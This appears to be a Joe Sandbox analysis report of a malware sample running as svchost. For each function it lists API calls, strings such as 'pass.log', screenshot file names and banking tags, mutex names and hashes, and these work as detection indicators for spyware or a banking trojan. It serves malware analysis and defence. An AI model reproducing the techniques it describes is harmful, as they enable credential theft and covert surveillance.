Instruction Fuzzy Hash: E85122766443226BD7249F69BC8CB6B7BA9EF86704F000618FD44A77C0DB62DD04C7A1

Function 02D0C3D9 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 113windowsleepthreadCOMMON

Download Yara Rule

APIs

GetWindow.USER32(00000000,00000005), ref: 02D0C34D
GetWindow.USER32(00000000), ref: 02D0C350
IsWindowVisible.USER32(00000000), ref: 02D0C355
IsWindowVisible.USER32(00000000), ref: 02D0C364
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D0C377
GetClassNameA.USER32(00000000,?,00000101), ref: 02D0C399
GetWindowInfo.USER32(00000000,?), ref: 02D0C405
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D0C427
SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D0C436
GetClassLongA.USER32(00000000,000000E6), ref: 02D0C43F
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D0C452
SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D0C462
SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D0C476
Sleep.KERNEL32(00000000), ref: 02D0C47E
EnumChildWindows.USER32(00000000,02D0C2A0,00000000), ref: 02D0C48C
GetWindow.USER32(00000000,00000003), ref: 02D0C495
Sleep.KERNEL32(00000001), ref: 02D0C4A3

Strings

<, xrefs: 02D0C3FE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
String ID: <
API String ID: 1978407388-4251816714
Opcode ID: ad9572db9b56584dce8729f86218b9685f3ef798cf1947749310a3f78b80a98b
Instruction ID: 1d88cf3431f5766e2035e16c390c359605202b574f124161ee8c710578b7e9ac
Opcode Fuzzy Hash: ad9572db9b56584dce8729f86218b9685f3ef798cf1947749310a3f78b80a98b
Instruction Fuzzy Hash: D531F834AA06156BE7219F64ECCAFBE37A8FF05755F800705F245E92D0C7A49E11CA68

Function 02D212A0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c590689), ref: 02D212C7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D21315
GetLastError.KERNEL32 ref: 02D21321
IsUserAnAdmin.SHELL32 ref: 02D21325
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D21336
SetLastError.KERNEL32(00000000), ref: 02D2133D
PathAddBackslashA.SHLWAPI(?), ref: 02D21370
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D2137F
GetLastError.KERNEL32 ref: 02D21385
IsUserAnAdmin.SHELL32 ref: 02D21389
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D2139A
SetLastError.KERNEL32(00000000), ref: 02D213A1
_snprintf.MSVCRT ref: 02D213CF
Sleep.KERNEL32(00000FA0,?), ref: 02D213E5

Strings

\t, xrefs: 02D212C7, 02D21370
scrs, xrefs: 02D21358
%s\%02d.bmp, xrefs: 02D213BE
5c590689, xrefs: 02D212C2, 02D212CD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$5c590689$scrs$\t
API String ID: 1455050916-2983098707
Opcode ID: b504194b15706bc196d072fbef627e8d5a6653b00911ef0ddcf6682178ed6bd4
Instruction ID: c2e144dadced85f9b8a26ab8fec3641e85b7a711105f417a9054eb4d1ca45426
Opcode Fuzzy Hash: b504194b15706bc196d072fbef627e8d5a6653b00911ef0ddcf6682178ed6bd4
Instruction Fuzzy Hash: F43129799002295BCB209F74AD98BEB77E8AF25304F448594E9C9C7301DB70DD48CBA0

Function 02D1C1F0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C217
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1C265
GetLastError.KERNEL32 ref: 02D1C271
IsUserAnAdmin.SHELL32 ref: 02D1C275
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1C286
SetLastError.KERNEL32(00000000), ref: 02D1C28D
PathAddBackslashA.SHLWAPI(?), ref: 02D1C2C0
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1C2CF
GetLastError.KERNEL32 ref: 02D1C2D5
IsUserAnAdmin.SHELL32 ref: 02D1C2D9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1C2EA
SetLastError.KERNEL32(00000000), ref: 02D1C2F1
_snprintf.MSVCRT ref: 02D1C31F
Sleep.KERNEL32(00000FA0,?), ref: 02D1C335

Strings

5C590552, xrefs: 02D1C212, 02D1C21D
\t, xrefs: 02D1C217, 02D1C2C0
scrs, xrefs: 02D1C2A8
%s\%02d.bmp, xrefs: 02D1C30E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$5C590552$scrs$\t
API String ID: 1455050916-2720195496
Opcode ID: 3704084db3399572ec37a9644a73d66e3c0a7af75e40f375746812fe65771266
Instruction ID: e242afb22a5686b17e8df23c83775768d73329ca9fc9ebb4bf7445e3b3aef3c8
Opcode Fuzzy Hash: 3704084db3399572ec37a9644a73d66e3c0a7af75e40f375746812fe65771266
Instruction Fuzzy Hash: D7316A799402196BCB248FB4BC98BEB77E8EB15B00F848595E986C7300DBB0DD54CBA1

Function 02D201D0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116memoryfileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,00000000,00000000,74E17390,?,02D0148C,00000000,?), ref: 02D2020A
GetProcessHeap.KERNEL32(00000008,?,?,02D0148C,00000000,?), ref: 02D20229
HeapAlloc.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D20230
memset.MSVCRT ref: 02D20248
SetFilePointer.KERNEL32 ref: 02D20263
LockFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02D20274
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02D20284
UnlockFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D20299
StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02D202B2
StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02D202BE
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,74E17390,?,02D0148C,00000000,?), ref: 02D202DB
GetProcessHeap.KERNEL32(00000000,00000000,?,02D0148C,00000000,?), ref: 02D202EE
HeapValidate.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D202F1
GetProcessHeap.KERNEL32(00000000,00000000,?,02D0148C,00000000,?), ref: 02D202FE
HeapFree.KERNEL32(00000000,?,02D0148C,00000000,?), ref: 02D20301

Strings

END SIGNATURE, xrefs: 02D202B8
BEGIN SIGNATURE, xrefs: 02D202AC

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$Pointer$AllocFreeLockReadSizeUnlockValidatememset
String ID: BEGIN SIGNATURE$END SIGNATURE
API String ID: 373673121-4158457813
Opcode ID: 8bf9a8dbe3f3276a6dee7a440506260b41ffae436f1aacfa9caa66a4603c076e
Instruction ID: 1d9f351b7a7a68480621c7af0752e145e09be1efb1305f863ec7e66bcf3eb728
Opcode Fuzzy Hash: 8bf9a8dbe3f3276a6dee7a440506260b41ffae436f1aacfa9caa66a4603c076e
Instruction Fuzzy Hash: 8431D371945320ABE3108F649C89F2B7BECEF64B09F444A1AF944E6380D7B0DD18CBA5

Function 02D21B60 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 115synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c59011e), ref: 02D21BA7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D21BE7
GetLastError.KERNEL32 ref: 02D21BF1
IsUserAnAdmin.SHELL32 ref: 02D21BF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D21C0A
SetLastError.KERNEL32(00000000), ref: 02D21C11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D21C4B
DeleteFileA.KERNEL32(?), ref: 02D21C58
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D21C77
Sleep.KERNEL32(000003E8), ref: 02D21C88
ReleaseMutex.KERNEL32(00000000), ref: 02D21C8F
GetHandleInformation.KERNEL32(00000000,?), ref: 02D21CA1
CloseHandle.KERNEL32(00000000), ref: 02D21CB2

Strings

pass.log, xrefs: 02D21C28
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D21C6E
\t, xrefs: 02D21BA7
5c59011e, xrefs: 02D21BA2, 02D21BAD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
String ID: 5c59011e$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log$\t
API String ID: 1707266166-2403507088
Opcode ID: 5156b964be4b5bf834cf18fbe94c987e51b256bca78cfcc9cf36217e6f69a6fc
Instruction ID: 64fbda0441ca537faec3db2c0d242099e3736fdc4f80fd7207f998b0f5efb845
Opcode Fuzzy Hash: 5156b964be4b5bf834cf18fbe94c987e51b256bca78cfcc9cf36217e6f69a6fc
Instruction Fuzzy Hash: D0411638944229ABDB108F24E858BEA7BF8EF65305F148595E889C7340DBB0DE58CB60

Function 02D21B88 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 107synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c59011e), ref: 02D21BA7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D21BE7
GetLastError.KERNEL32 ref: 02D21BF1
IsUserAnAdmin.SHELL32 ref: 02D21BF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D21C0A
SetLastError.KERNEL32(00000000), ref: 02D21C11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D21C4B
DeleteFileA.KERNEL32(?), ref: 02D21C58
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D21C77
Sleep.KERNEL32(000003E8), ref: 02D21C88
ReleaseMutex.KERNEL32(00000000), ref: 02D21C8F
GetHandleInformation.KERNEL32(00000000,?), ref: 02D21CA1
CloseHandle.KERNEL32(00000000), ref: 02D21CB2

Strings

pass.log, xrefs: 02D21C28
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D21C6E
\t, xrefs: 02D21BA7
5c59011e, xrefs: 02D21BA2, 02D21BAD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
String ID: 5c59011e$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log$\t
API String ID: 1707266166-2403507088
Opcode ID: e99836a8dff0c07db52a745d47603f259b08ff1da40d4923c5b5b48df36e5576
Instruction ID: 7ee4ccdc8c46474ea65174e3cc9d7ac5af38b32320e9d5dd1c458c49d512fe32
Opcode Fuzzy Hash: e99836a8dff0c07db52a745d47603f259b08ff1da40d4923c5b5b48df36e5576
Instruction Fuzzy Hash: 2D31E238944219AFDB108F24E858BEABBF8EF65305F148595F889D7340DB70DE54CB50

Function 02D1B240 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c590506), ref: 02D1B26A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1B2AC
GetLastError.KERNEL32 ref: 02D1B2B8
IsUserAnAdmin.SHELL32 ref: 02D1B2BC
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1B2CD
SetLastError.KERNEL32(00000000), ref: 02D1B2D4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1B303
GetLastError.KERNEL32 ref: 02D1B309
IsUserAnAdmin.SHELL32 ref: 02D1B30D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1B31E
SetLastError.KERNEL32(00000000), ref: 02D1B325
_snprintf.MSVCRT ref: 02D1B35A
Sleep.KERNEL32(00000FA0,?), ref: 02D1B370

Strings

5c590506, xrefs: 02D1B265, 02D1B270
\t, xrefs: 02D1B26A
scrs, xrefs: 02D1B2E9
%s\%02d.bmp, xrefs: 02D1B349

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5c590506$scrs$\t
API String ID: 224938940-3318709765
Opcode ID: b5695bd75c9d66ad089eab3c8b0357b60af7cc5f062a4ada73d725e77cafec31
Instruction ID: a232e050be21e2f8fff25c082c34da3e35bb8ecfe99606caa528835abc1ef5cf
Opcode Fuzzy Hash: b5695bd75c9d66ad089eab3c8b0357b60af7cc5f062a4ada73d725e77cafec31
Instruction Fuzzy Hash: 8F3137759002186BCB209F74BC98BEB77E8EB69708F944491E9C5C3300DB70DD58CBA0

Function 02D1E8D0 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c59043a), ref: 02D1E8FA
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E93C
GetLastError.KERNEL32 ref: 02D1E948
IsUserAnAdmin.SHELL32 ref: 02D1E94C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E95D
SetLastError.KERNEL32(00000000), ref: 02D1E964
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E993
GetLastError.KERNEL32 ref: 02D1E999
IsUserAnAdmin.SHELL32 ref: 02D1E99D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E9AE
SetLastError.KERNEL32(00000000), ref: 02D1E9B5
_snprintf.MSVCRT ref: 02D1E9EA
Sleep.KERNEL32(00000FA0,?), ref: 02D1EA00

Strings

\t, xrefs: 02D1E8FA
scrs, xrefs: 02D1E979
%s\%02d.bmp, xrefs: 02D1E9D9
5c59043a, xrefs: 02D1E8F5, 02D1E900

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5c59043a$scrs$\t
API String ID: 224938940-2117724828
Opcode ID: fc92f824d93017afa1e8f5505a8533142c6148f6ee685caa87c63a6a8acc48af
Instruction ID: 2e84b8620137cc1d08baf9ede52b8cb64689f59839a1ed97a1b8e8c67f38c6be
Opcode Fuzzy Hash: fc92f824d93017afa1e8f5505a8533142c6148f6ee685caa87c63a6a8acc48af
Instruction Fuzzy Hash: E7313579D002286BCB20DB74BC98BEB77E8AB55704F844891ED85C3340EBB0DD44CBA0

Function 02D21990 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C590608), ref: 02D219BA
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D219FC
GetLastError.KERNEL32 ref: 02D21A08
IsUserAnAdmin.SHELL32 ref: 02D21A0C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D21A1D
SetLastError.KERNEL32(00000000), ref: 02D21A24
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D21A53
GetLastError.KERNEL32 ref: 02D21A59
IsUserAnAdmin.SHELL32 ref: 02D21A5D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D21A6E
SetLastError.KERNEL32(00000000), ref: 02D21A75
_snprintf.MSVCRT ref: 02D21AAA
Sleep.KERNEL32(00000FA0,?), ref: 02D21AC0

Strings

\t, xrefs: 02D219BA
scrs, xrefs: 02D21A39
5C590608, xrefs: 02D219B5, 02D219C0
%s\%02d.bmp, xrefs: 02D21A99

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$5C590608$scrs$\t
API String ID: 224938940-3975026732
Opcode ID: 557543b02412bec706a03a42ec46dcac975d668d195d4890f7d7ce3c97cd679e
Instruction ID: cdc85fc016fc1c40194bc165a3af4ddf0fd780307988ebf6dfedafc0aea79880
Opcode Fuzzy Hash: 557543b02412bec706a03a42ec46dcac975d668d195d4890f7d7ce3c97cd679e
Instruction Fuzzy Hash: 1B313775D002285BCB20DB74AC98BEB77E8AF65708F848590E9C9D3301DB70DD49CBA0

Function 02D208E0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D208FC
Sleep.KERNEL32(00000064), ref: 02D20912
OpenMutexA.KERNEL32(00100000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D20920
ReleaseMutex.KERNEL32(00000000), ref: 02D20929
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D20947
CloseHandle.KERNEL32(00000000), ref: 02D20955
CreateThread.KERNEL32(00000000,00000000,02D20790,00000000,00000000,00000000), ref: 02D2096A
Sleep.KERNEL32(00009C40), ref: 02D2097B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D20980
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D20994
CloseHandle.KERNEL32(00000000), ref: 02D209A2
PathAddBackslashA.SHLWAPI(5c590484), ref: 02D209AD
Sleep.KERNEL32(00009C40,5c590484,INIST), ref: 02D209C7

Strings

5c590484, xrefs: 02D209A8, 02D209B8
\t, xrefs: 02D209AD
INIST, xrefs: 02D209B3
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D208F0, 02D20914

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5c590484$INIST$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$\t
API String ID: 2736094147-1028557238
Opcode ID: 56d35ba2bb75be71208c668628e4aa43d19c293cb51ddc972aa7820d6f59e15a
Instruction ID: fc56cd7833d8c433ca05c35d52ad6bd6de50c8b4c6a3e8213b6308126d7816ae
Opcode Fuzzy Hash: 56d35ba2bb75be71208c668628e4aa43d19c293cb51ddc972aa7820d6f59e15a
Instruction Fuzzy Hash: E3213A35AC53253BF2105B60AC06F1A73D49F75B5AF144604FE45B63C08BF0AD188AE6

Function 02D20070 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D2008C
Sleep.KERNEL32(00000064), ref: 02D200A2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D200B0
ReleaseMutex.KERNEL32(00000000), ref: 02D200B9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D200D7
CloseHandle.KERNEL32(00000000), ref: 02D200E5
CreateThread.KERNEL32(00000000,00000000,02D1FF20,00000000,00000000,00000000), ref: 02D200FA
Sleep.KERNEL32(00009C40), ref: 02D2010B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D20110
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D20124
CloseHandle.KERNEL32(00000000), ref: 02D20132
PathAddBackslashA.SHLWAPI(5C5904FC), ref: 02D2013D
Sleep.KERNEL32(00009C40,5C5904FC,IBANK), ref: 02D20157

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}, xrefs: 02D20080, 02D200A4
5C5904FC, xrefs: 02D20138, 02D20148
IBANK, xrefs: 02D20143
\t, xrefs: 02D2013D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5C5904FC$IBANK$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$\t
API String ID: 2736094147-2087944852
Opcode ID: 6d0038d0d8c7ff818bbdf3f3c042bdf63207e01aae24fbb882fe2429ab3f0872
Instruction ID: 3827e549f23275fcfb1150fc650d48dc84243aefd474c7fdc32b07a40e657262
Opcode Fuzzy Hash: 6d0038d0d8c7ff818bbdf3f3c042bdf63207e01aae24fbb882fe2429ab3f0872
Instruction Fuzzy Hash: 2C21F835AC57243BF2215B606C0AF1E73D89F65B69F604604FE45A63C09BF4AC0886A6

Function 02D21060 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D2107C
Sleep.KERNEL32(00000064), ref: 02D21092
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02D210A0
ReleaseMutex.KERNEL32(00000000), ref: 02D210A9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D210C7
CloseHandle.KERNEL32(00000000), ref: 02D210D5
CreateThread.KERNEL32(00000000,00000000,02D20DE0,00000000,00000000,00000000), ref: 02D210EA
Sleep.KERNEL32(00009C40), ref: 02D210FB
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D21100
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D21114
CloseHandle.KERNEL32(00000000), ref: 02D21122
PathAddBackslashA.SHLWAPI(5C59061E), ref: 02D2112D
Sleep.KERNEL32(00009C40,5C59061E,INTER), ref: 02D21147

Strings

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}, xrefs: 02D21070, 02D21094
\t, xrefs: 02D2112D
5C59061E, xrefs: 02D21128, 02D21138
INTER, xrefs: 02D21133

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5C59061E$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$\t
API String ID: 2736094147-1476036043
Opcode ID: d57750981b922812e1fd9216146b67ceeb9a49599e6e56e90ee1664617d1d34d
Instruction ID: 45711385bb1995b52fc7a256627bfd117453c7d3e695faeade85c067f5595b13
Opcode Fuzzy Hash: d57750981b922812e1fd9216146b67ceeb9a49599e6e56e90ee1664617d1d34d
Instruction Fuzzy Hash: 4F21F835AC47753BF3219B606C06F1A73D49F25B59F208505FE09663C19BF0EC0986A9

Function 02D1F1B0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D1F1CC
Sleep.KERNEL32(00000064), ref: 02D1F1E2
OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D1F1F0
ReleaseMutex.KERNEL32(00000000), ref: 02D1F1F9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D1F217
CloseHandle.KERNEL32(00000000), ref: 02D1F225
CreateThread.KERNEL32(00000000,00000000,02D1EDD0,00000000,00000000,00000000), ref: 02D1F23A
Sleep.KERNEL32(00009C40), ref: 02D1F24B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D1F250
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D1F264
CloseHandle.KERNEL32(00000000), ref: 02D1F272
PathAddBackslashA.SHLWAPI(5C59047E), ref: 02D1F27D
Sleep.KERNEL32(00009C40,5C59047E,FAKTURA), ref: 02D1F297

Strings

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D1F1C0, 02D1F1E4
\t, xrefs: 02D1F27D
FAKTURA, xrefs: 02D1F283
5C59047E, xrefs: 02D1F278, 02D1F288

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

